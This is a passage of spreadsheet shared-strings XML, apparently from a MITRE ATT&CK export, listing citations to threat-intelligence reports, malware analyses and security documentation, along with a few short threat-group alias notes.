    <t>Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>Group-IB and Fox-IT. (2014, December). Anunak: APT against financial institutions. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.</t>
  </si>
  <si>
    <t>Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named HAYMAKER by FireEye is likely the same as the malware ChChes. (Citation: FireEye APT10 April 2017) (Citation: Twitter Nick Carr APT10)</t>
  </si>
  <si>
    <t>The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.</t>
  </si>
  <si>
    <t>Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.</t>
  </si>
  <si>
    <t>Hananel Livneh. (2022, April 7). Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022. Retrieved May 31, 2022.</t>
  </si>
  <si>
    <t>Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>Haq, T., Moran, N., Scott, M., &amp; Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks &amp;#91;Blog&amp;#93;. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.</t>
  </si>
  <si>
    <t>Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017.</t>
  </si>
  <si>
    <t>HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020.</t>
  </si>
  <si>
    <t>Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.</t>
  </si>
  <si>
    <t>Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.</t>
  </si>
  <si>
    <t>Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part 18. Retrieved November 15, 2019.</t>
  </si>
  <si>
    <t>Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.</t>
  </si>
  <si>
    <t>Aliz Hammond. (2019, August 15). Hiding Malicious Code with "Module Stomping": Part 1. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Security Lab. (2020, June 5). Avaddon: From seeking affiliates to in-the-wild in 2 days. Retrieved August 19, 2021.</t>
  </si>
  <si>
    <t>Chris Hoffman. (2017, March 8). How to Make Windows Show File Extensions. Retrieved August 4, 2021.</t>
  </si>
  <si>
    <t>Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.</t>
  </si>
  <si>
    <t>Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.</t>
  </si>
  <si>
    <t>Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.</t>
  </si>
  <si>
    <t>Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.</t>
  </si>
  <si>
    <t>McMillen, D. Sperry, C. (2019, June 14). Observations of ITG07 Cyber Operations. Retrieved May 17, 2021.</t>
  </si>
  <si>
    <t>Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.</t>
  </si>
  <si>
    <t>Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.</t>
  </si>
  <si>
    <t>Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.</t>
  </si>
  <si>
    <t>Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.</t>
  </si>
  <si>
    <t>ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.</t>
  </si>
  <si>
    <t>Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.</t>
  </si>
  <si>
    <t>Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.</t>
  </si>
  <si>
    <t>Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.</t>
  </si>
  <si>
    <t>Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)</t>
  </si>
  <si>
    <t>Kondratiev, A. (n.d.). Disabling dangerous PHP functions. Retrieved July 26, 2021.</t>
  </si>
  <si>
    <t>Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.</t>
  </si>
  <si>
    <t>Unit 42. (2019, December 2). Imminent Monitor – a RAT Down Under. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>SecureAuth. (n.d.).  Retrieved January 15, 2019.</t>
  </si>
  <si>
    <t>Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.</t>
  </si>
  <si>
    <t>Boelen, M. (2015, October 7). Increase kernel integrity with disabled Linux kernel modules loading. Retrieved June 4, 2020.</t>
  </si>
  <si>
    <t>Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Hoang, M. (2019, January 31). Malicious Activity Report: Elements of  Lokibot Infostealer. Retrieved May 15, 2020.</t>
  </si>
  <si>
    <t>Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Sander, J. (2017, October 12). Attack Step 3: Persistence with NTFS Extended Attributes – File System Attacks. Retrieved March 21, 2018.</t>
  </si>
  <si>
    <t>Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.</t>
  </si>
  <si>
    <t>Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.</t>
  </si>
  <si>
    <t>Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.</t>
  </si>
  <si>
    <t>Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.</t>
  </si>
  <si>
    <t>Intel. (2013). Intel Hardware-based Security Technologies for Intelligent Retail Devices. Retrieved May 19, 2020.</t>
  </si>
  <si>
    <t>Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.</t>
  </si>
  <si>
    <t>Rosenberg, J. (2017, September 20). Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner. Retrieved February 13, 2018.</t>
  </si>
  <si>
    <t>Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.</t>
  </si>
  <si>
    <t>Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.</t>
  </si>
  <si>
    <t>Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Belcher, P.. (2016, July 28). Tunnel of Gov: DNC Hack and the Russian XTunnel. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.</t>
  </si>
  <si>
    <t>Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&amp;C Servers Using Cookie Headers. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Labs refers to the "mediaplayer.exe" dropper within [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) as the JackOfHearts.(Citation: Kaspersky IAmTheKing October 2020)</t>
  </si>
  <si>
    <t>Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell&amp;#91;slides&amp;#93;. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>James. (2019, July 14). @James_inthe_box. Retrieved March 28, 2022.</t>
  </si>
  <si>
    <t>Holland, J. (2016, January 25). User password policies on non AD machines. Retrieved April 5, 2018.</t>
  </si>
  <si>
    <t>Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.</t>
  </si>
  <si>
    <t>Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.</t>
  </si>
  <si>
    <t>Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.</t>
  </si>
  <si>
    <t>Joe Security. (n.d.). Analysis Report fasm.dll. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.</t>
  </si>
  <si>
    <t>Juniper. (2020, September 23). Understanding and Using Dynamic ARP Inspection (DAI). Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.</t>
  </si>
  <si>
    <t>Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.</t>
  </si>
  <si>
    <t>KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022.</t>
  </si>
  <si>
    <t>Kali. (2014, February 18). THC-Hydra. Retrieved November 2, 2017.</t>
  </si>
  <si>
    <t>NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.</t>
  </si>
  <si>
    <t>Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.</t>
  </si>
  <si>
    <t>Kanthak, S. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.</t>
  </si>
  <si>
    <t>Global Research and Analysis Team. (2020, April 30). APT trends report Q1 2020. Retrieved September 19, 2022.</t>
  </si>
  <si>
    <t>GReAT . (2021, April 27). APT trends report Q1 2021. Retrieved June 6, 2022.</t>
  </si>
  <si>
    <t>Kamluk, V. &amp; Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Park, S. (2021, June 15). Andariel evolves to target South Korea with ransomware. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.</t>
  </si>
  <si>
    <t>GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.</t>
  </si>
  <si>
    <t>Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab. (2015, June 11). The Duqu 2.0. Retrieved April 21, 2017.</t>
  </si>
  <si>
    <t>Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.</t>
  </si>
  <si>
    <t>GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Gostev, A. (2012, May 30). Flame: Bunny, Frog, Munch and BeetleJuice…. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.</t>
  </si>
  <si>
    <t>Ivan Kwiatkowski, Pierre Delcher, Felix Aime. (2020, October 15). IAmTheKing and the SlothfulMedia malware family. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelgänging technique. Retrieved May 24, 2018.</t>
  </si>
  <si>
    <t>GREAT. (2017, April 11). Unraveling the Lamberts Toolkit. Retrieved March 21, 2022.</t>
  </si>
  <si>
    <t>GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved October 3, 2018.</t>
  </si>
  <si>
    <t>GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.</t>
  </si>
  <si>
    <t>Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote attack on Microsoft SQL Server. Retrieved September 4, 2019.</t>
  </si>
  <si>
    <t>GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.</t>
  </si>
  <si>
    <t>Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.</t>
  </si>
  <si>
    <t>Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.</t>
  </si>
  <si>
    <t>GReAT. (2019, April 10). Project TajMahal – a sophisticated new APT framework. Retrieved October 14, 2019.</t>
  </si>
  <si>
    <t>Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.</t>
  </si>
  <si>
    <t>Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.</t>
  </si>
  <si>
    <t>Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.</t>
  </si>
  <si>
    <t>Baumgartner, K. and Raiu, C. (2014, December 8). The ‘Penquin’ Turla. Retrieved March 11, 2021.</t>
  </si>
  <si>
    <t>Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 27, 2017.</t>
  </si>
  <si>
    <t>Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Kernel.org. (2020, February 6). Kernel Self-Protection. Retrieved June 4, 2020.</t>
  </si>
  <si>
    <t>Vander Stoep, J. (2016, April 5). [v3] selinux: restrict kernel module loadinglogin  register. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.</t>
  </si>
  <si>
    <t>Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Keychain Items. Retrieved April 12, 2022.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.</t>
  </si>
  <si>
    <t>Mark Manning. (2020, July 23). Keyctl-unmask: "Going Florida" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.</t>
  </si>
  <si>
    <t>Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.</t>
  </si>
  <si>
    <t>Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.</t>
  </si>
  <si>
    <t>Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.</t>
  </si>
  <si>
    <t>Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.</t>
  </si>
  <si>
    <t>Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.</t>
  </si>
  <si>
    <t>Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.</t>
  </si>
  <si>
    <t>Brian Krebs. (2016, October 27). Are the Days of “Booter” Services Numbered?. Retrieved May 15, 2017.</t>
  </si>
  <si>
    <t>Sette, N. et al. (2020, June 4). Qakbot Malware Now Exfiltrating Emails for Sophisticated Thread Hijacking Attacks. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Nesbit, B. and Ackerman, D. (2017, January). Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder’s Toolkit. Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>kubenetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>The Kubernetes Authors. (n.d.). Controlling Access to The Kubernetes API. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>National Security Agency, Cybersecurity and Infrastructure Security Agency. (2022, March). Kubernetes Hardening Guide. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Pingios, A.. (2018, February 7). LKM loading kernel restrictions. Retrieved June 4, 2020.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Expand.exe. Retrieved February 19, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.</t>
  </si>
  <si>
